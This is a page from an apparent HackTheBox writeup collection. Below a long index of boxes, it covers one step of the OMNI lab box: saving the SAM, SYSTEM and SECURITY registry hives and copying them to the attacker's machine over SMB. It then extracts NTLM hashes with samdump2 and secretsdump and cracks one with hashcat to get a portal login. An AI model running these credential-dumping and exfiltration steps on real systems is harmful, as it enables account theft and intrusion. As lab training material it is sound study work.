🔐
HackTheBox Writeups
  • kashz HTB Writeups
  • HTB BOXES
    • ACCESS
      • 5 admin
      • 4 user
      • 3 telnet
      • 2 http
      • 1 recon
    • ADMIRER
      • 5 root
      • 4 adminer-php
      • 3 ftp
      • 2 http
      • 1 recon
    • ARCHETYPE
      • 3 :1433 mssql
      • 2 :139 :445 smb
      • 1 recon
    • ARMAGEDDON
      • 8 privesc dirty_sockv2
      • 7 privesc
      • 6 box enum bruce
      • 5 :80 drupalgeddon2
      • 4 :80 droopescan
      • 3 :80
      • 2 :80 robots.txt
      • 1 recon
    • ATOM
      • 4 privesc
      • 3 box enum jason
      • 2 :139 :445 smb
      • 1 recon
    • BANK
      • 5 privesc
      • 4 box enum
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • BANKROBBER
      • 6 privesc brute force PIN > BOF
      • 5 privesc bankv2.exe
      • 4 box enum cortin
      • 3 admin backdoorchecker.php
      • 2 :80 :443 XSS > admin
      • 1 recon
    • BASHED
      • 2 :80
      • 1 recon
    • BASTARD
      • 6 privesc_2 ms10-059
      • 5 privesc_1 ms15-051
      • 4 box enum KE
      • 3 :80 drupalgeddon2
      • 2 :80 drupal7
      • 1 recon
    • BASTION
      • 3 box enum > privesc
      • 2 :139 :445 smb
      • 1 recon
    • BEEP
      • 7 :80 elastix 2.2.0 RCE + privesc
      • 6 :10000 webmin
      • 5 :25 smtp
      • 4 :80 vtigercrm
      • 3 :80 admin
      • 2 :80
      • 1 recon
    • BLOCKY
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • BLUE
      • 3 ms17-010
      • 2 :139 :445 smb
      • 1 recon
    • BLUNDER
      • 5 www-data > hugo > root
      • 4 box enum
      • 3 bludit 3.9.2 file_upload RCE
      • 2 :80
      • 1 recon
    • BOUNTY
      • 4 JuicyPotato
      • 3 privesc check
      • 2 :80
      • 1 recon
    • BOUNTYHUNTER
      • 4 privesc
      • 3 :22 ssh development
      • 2 :80 xxe
      • 1 recon
    • BRAINFUCK
      • 5 privesc
      • 5 :443 sup3rs3cr3t.brainfuck.htb
      • 4 :143 imap
      • 3 :443 wpscan
      • 2 :443
      • 1 recon
    • BRAINPAN1
      • 4 privesc
      • 3 BOF
      • 2 :10000
      • 1 recon
    • BUCKET
      • 6 privesc
      • 5 dynamodb roy
      • 4 box enum www-data
      • 3 :80 s3.bucket.htb
      • 2 :80 bucket.htb
      • 1 recon
    • BUFF
      • 4 privesc
      • 3 :80
      • 2 :8080
      • 1 recon
    • CAP
      • 4 privesc
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • CHATTERBOX
      • 5 privesc autologon creds
      • 4 privesc w/ grant perm
      • 3 box enum
      • 2 :9256 achat chat system
      • 1 recon
    • CONCEAL
      • 9 privesc
      • 8 :80
      • 7 :21 ftp
      • 6 post vpn recon
      • 5 ipsec conn config
      • 4 ipsec summary
      • 3 :500/udp ipsec
      • 2 :161/udp snmp
      • 1 recon
    • CRONOS
      • 6 post enum
      • 5 privesc cronjob
      • 4 box enum
      • 3 :53 dns
      • 2 :80
      • 1 recon
    • DELIVERY
      • 4 :3306 mysql > privesc
      • 3 :8065 mattermost
      • 2 :80
      • 1 recon
    • DEVEL
      • 4 privesc_2 ms11-046
      • 3 privesc_1 JuicyPotato
      • 2 :21 ftp
      • 1 recon
    • DOCTOR
      • 7 post enum
      • 6 :8089 privesc splunk > root
      • 5 web > shaun
      • 4 box enum web
      • 3 :80 SSTI
      • 2 :80 splunkd
      • 1 recon
    • DYNSTR
      • 6 privesc
      • 5 box enum > bindmgr
      • 4 nsupdate exploit
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • EXPLORE
      • 3 :2222 ssh kristi > root
      • 2 :59777 es file explorer
      • 1 recon
    • FRIENDZONE
      • 7 privesc
      • 6 administrator1.friendzone.red
      • 5 dns
      • 4 smb
      • 3 :443
      • 2 :80
      • 1 recon
    • FUSE
      • 7 privesc SeLoadDriverPrivilege
      • 6 rpc
      • 5 spray passwd
      • 4 :389 ldap
      • 3 :80 PaperCut Logger
      • 2 :139 :445 smb
      • 1 recon
    • GRANDPA
      • 4 privesc
      • 3 webdav exploit
      • 2 :80
      • 1 recon
    • GRANNY
      • 4 privesc
      • 3 :80 webdav exploit
      • 2 :80
      • 1 recon
    • HAIRCUT
      • 5 post enum
      • 4 privesc www-data > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • IRKED
      • 4 box enum
      • 3 :6697 irc
      • 2 :80
      • 1 recon
    • JARVIS
      • 9 post enum
      • 8 pepper > root
      • 7 www-data > pepper
      • 6 box enum www-data
      • 5 phpMyAdmin 4.8 LFI
      • 4 :80 sqli
      • 3 :64999
      • 2 :80
      • 1 recon
    • JEEVES
      • 2 :50000
      • 1 recon
    • JERRY
      • 4 manual
      • 3 tomcatWarDeployer
      • 2 :8080 tomcat
      • 1 recon
    • KNIFE
      • 3 privesc
      • 2 :80 php 8.1.0 dev
      • 1 recon
    • LABORATORY
      • 6 privesc
      • 5 gitlab admin dexter
      • 4 stable shell
      • 3 :443 gitlab shell
      • 2 :443 gitlab
      • 1 recon
    • LACASADEPAPEL
      • 4 box enum > privesc
      • 3 :80 > :443
      • 2 :21 ftp
      • 1 recon
    • LAME
      • 4 :139 :445 smb exploit
      • 3 :3632 distccd
      • 2 :139 :445 smb
      • 1 recon
    • LEGACY
      • 4 MS-17-010
      • 3 MS08-067
      • 2 :139 :445 smb
      • 1 recon
    • LOVE
      • 3 privesc
      • 2 :80
      • 1 recon
    • MAGIC
      • 5 post enum
      • 4 privesc theseus > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • MANGO
      • 6 post enum
      • 5 privesc admin > root
      • 4 mango > admin
      • 3 box enum mango
      • 2 :80 :443
      • 1 recon
    • MIRAI
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • MONITORS
      • 12 post enum
      • 11 docker breakout > root
      • 10 Apache Tomcat/9.0.31 deserialization RCE > docker root
      • 9 box enum marcus
      • 8 manual enum www-data
      • 7 :8443
      • 6 box enum www-data
      • 5 cacti-admin.monitors.htb
      • 4 wp with spritz exploit
      • 3 :80 wpscan
      • 2 :80
      • 1 recon
    • NETWORKED
      • 7 post enum
      • 6 box enum guly > privesc > root
      • 5 check_attack.php
      • 4 box enum
      • 3 :80 upload.php & lib.php
      • 2 :80
      • 1 recon
    • NIBBLES
      • 4 privesc
      • 3 fileUpload exploit
      • 2 :80
      • 1 recon
    • NINEVEH
      • 6 post enum
      • 5 privesc amrois > root
      • 4 box enum www-data > amrois
      • 3 :443
      • 2 :80
      • 1 recon
    • NODE
      • 7 post enum
      • 6 privesc tom > root
      • 5 mark > tom
      • 4 box enum mark
      • 3 :3000 login
      • 2 :3000
      • 1 recon
    • OMNI
      • 5 cracking user.txt | root.txt
      • 4 dump SAM SYSTEM
      • 3 box enum ?
      • 2 :8080
      • 1 recon
    • OOPSIE
      • 4 post enum
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • OPENADMIN
      • 6 joanna > root
      • 5 jimmy > joanna
      • 4 manual enum > jimmy
      • 3 openNetAdmin 18.1.1
      • 2 :80
      • 1 recon
    • OPHIUCHI
      • 4 privesc
      • 3 yaml deserialization exploit
      • 2 :8080
      • 1 recon
    • OPTIMUM
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • PASSAGE
      • 7 post enum
      • 6 privesc dbus com.ubuntu.USBCreator.conf
      • 5 box enum nadav
      • 4 box enum paul
      • 3 box enum www-data
      • 2 :80 cutenews
      • 1 recon
    • POISON
      • 6 foothold_3 log poisoning
      • 5 foothold_2 phpinfo.php + LFI
      • 4 privesc vncviewer > root
      • 3 box enum charix
      • 2 :80
      • 1 recon
    • POPCORN
      • 7 post enum
      • 6 privesc_2 rds
      • 5 privesc_1 full-nelson
      • 4 manual privesc > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • POSTMAN
      • 6 webmin (matt > root)
      • 5 Matt > root
      • 4 redis > Matt
      • 3 :6379 redis
      • 2 :80
      • 1 recon
    • QUERIER
      • 6 privesc GPP CachedPassword
      • 5 privesc
      • 4 mssql using msf
      • 3 mssql
      • 2 smb
      • 1 recon
    • READY
      • 4 PEAS > docker > escape > root
      • 3 :5080 gitlab
      • 2 :5080 robots.txt
      • 1 recon
    • REMOTE
      • 8 privesc teamviewer
      • 7 privesc UsoSvc
      • 6 privesc
      • 5 RCE
      • 4 :111 rpc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • SCRIPTKIDDIE
      • 2 :5000
      • 1 recon
    • SECNOTES
      • 9 privesc_3 bash.exe
      • 8 privesc_2 UsoSvc
      • 7 privesc_1 PrintSpoofer
      • 6 box enum iis apppool
      • 5 :445 smb
      • 4 :80 CSRF
      • 3 :8808 IIS
      • 2 :80 IIS
      • 1 recon
    • SENSE
      • 2 :80 pfsense
      • 1 recon
    • SERVMON
      • 5 privesc
      • 4 box enum nadine
      • 3 :80 NVMS
      • 2 :21 ftp
      • 1 recon
    • SHIELD
      • 3 privesc
      • 2 :80
      • 1 recon
    • SHOCKER
      • 2 :80 shellshock
      • 1 recon
    • SILO
      • 6 odat shell
      • 5 sqlplus
      • 4 :1521 orcale tns listener
      • 3 :8080 XDB
      • 2 :80
      • 1 recon
    • SNEAKYMAILER
      • 11 post enum
      • 10 privesc low > root
      • 9 localhost:5000 > low
      • 8 box enum developer
      • 7 box enum www-data
      • 6 :21 ftp
      • 5 :143 imap
      • 4 :25 smtp
      • 3 :8080
      • 2 :80
      • 1 recon
    • SNIPER
      • 8 box enum chris + privesc
      • 7 iusr > chris
      • 6 privesc_1 PrintSpoofer
      • 5 box enum nt authority\iusr
      • 4 :80 /blog > LFI > smbRFI
      • 3 :80 /user
      • 2 :80
      • 1 recon
    • SOLIDSTATE
      • 7 privesc
      • 6 :22 ssh mindy
      • 5 :110 pop3
      • 4 apache james 2.3.2 RCE
      • 3 :4555 JAMES RAT 2.3.2
      • 2 :80
      • 1 recon
    • SPECTRA
      • 4 nginx shell > katie
      • 3 wordpress
      • 2 :80
      • 1 recon
    • SPIDER
      • 8 post enum
      • 7 localhost:8080 XXE
      • 6 box enum chiv manual
      • 5 box enum chiv
      • 4 :80 chiv login + SSTI
      • 3 :80 sqlmap via flask cookie
      • 2 :80 SSTI via /register to /user
      • 1 recon
    • SWAGSHOP
      • 3 privesc
      • 2 :80
      • 1 recon
    • TABBY
      • 5 tomcat > ash > root
      • 4 box enum
      • 3 :8080 tomcat9
      • 2 :80
      • 1 recon
    • TARTARSAUCE
      • 10 post enum
      • 9 privesc omuna > root
      • 8 box enum onuma
      • 7 www-data > onuma
      • 6 box enum www-data
      • 5 :80 monstra
      • 4 :80 wpscan
      • 3 :80 monstra
      • 2 :80
      • 1 recon
    • TENET
      • 4 privesc
      • 3 php file injection (deserialization exploit)
      • 2 :80 wordpress
      • 1 recon
    • THENOTEBOOK
      • 5 privesc docker runC exploit
      • 4 shell
      • 3 :80 JWT exploitation
      • 2 :80
      • 1 recon
    • TRAVEREXEC
      • 5 david > root
      • 4 www-data > david
      • 3 box enum
      • 2 :80 nostromo 1.9.6
      • 1 recon
    • VACCINE
      • 4 privesc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • VALENTINE
      • 6 privesc dirtyc0w
      • 5 privesc tmux
      • 4 box enum
      • 3 heartbleed
      • 2 :80
      • 1 recon
    • WORKER
      • 11 evil-winrim robisl :5985
      • 10 box manual enum
      • 9 box enum iis apppool\defaultapppool
      • 8 privesc PrintSoofer FAIL
      • 7 :80 spectral.worker.htb shell
      • 6 :80 devops.worker.htb
      • 5 explore domains
      • 4 :80 dimension.worker.htb
      • 3 :3690 subversion
      • 2 :80 IIS 10.0
      • 1 recon
Powered by GitBook
On this page
  1. HTB BOXES
  2. OMNI

4 dump SAM SYSTEM

c:\inetput\wwwwroot>fgdump.exe
This version of c:\inetput\wwwwroot\fgdump.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

Using https://www.hackingarticles.in/credential-dumping-sam/

# tried PwDump7
# tried wce.exe

# trying SamDump2
c:\inetput\wwwwroot>reg save hklm\sam C:\inetput\wwwwroot\sam
reg save hklm\sam C:\inetput\wwwwroot\sam
The operation completed successfully.

c:\inetput\wwwwroot>reg save hklm\system C:\inetput\wwwwroot\system
reg save hklm\system C:\inetput\wwwwroot\system
The operation completed successfully

c:\inetput\wwwwroot>reg save hklm\security C:\inetput\wwwwroot\security
reg save hklm\security C:\inetput\wwwwroot\security
The operation completed successfully.

# moving files to kali
c:\inetput\wwwwroot>copy sam \\10.10.16.7\drive\
copy sam \\10.10.16.7\drive\
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
        0 file(s) copied.

# $ smbserver.py -smb2support drive .
c:\inetput\wwwwroot>copy sam \\10.10.16.7\drive\
copy sam \\10.10.16.7\drive\
        1 file(s) copied.

c:\inetput\wwwwroot>copy system \\10.10.16.7\drive\
copy system \\10.10.16.7\drive\
        1 file(s) copied.
		
c:\inetput\wwwwroot>copy security \\10.10.16.7\drive\
copy system \\10.10.16.7\drive\
        1 file(s) copied.

$ file sam system
sam:    MS Windows registry file, NT/2000 or above
system: MS Windows registry file, NT/2000 or above

$ samdump2 system sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[OR]
$ secretsdump.py -sam sam -security security -system system LOCAL
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...

# cracked app
e3cb0651718ee9b4faffe19a51faff95	NTLM	mesh5143

$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143

# using app:mesh5143 we can log in to Windows Device Portal
http://10.10.10.204:8080/#Device%20Settings
| v.10.0.17763.107
Previous5 cracking user.txt | root.txtNext3 box enum ?

Last updated 3 years ago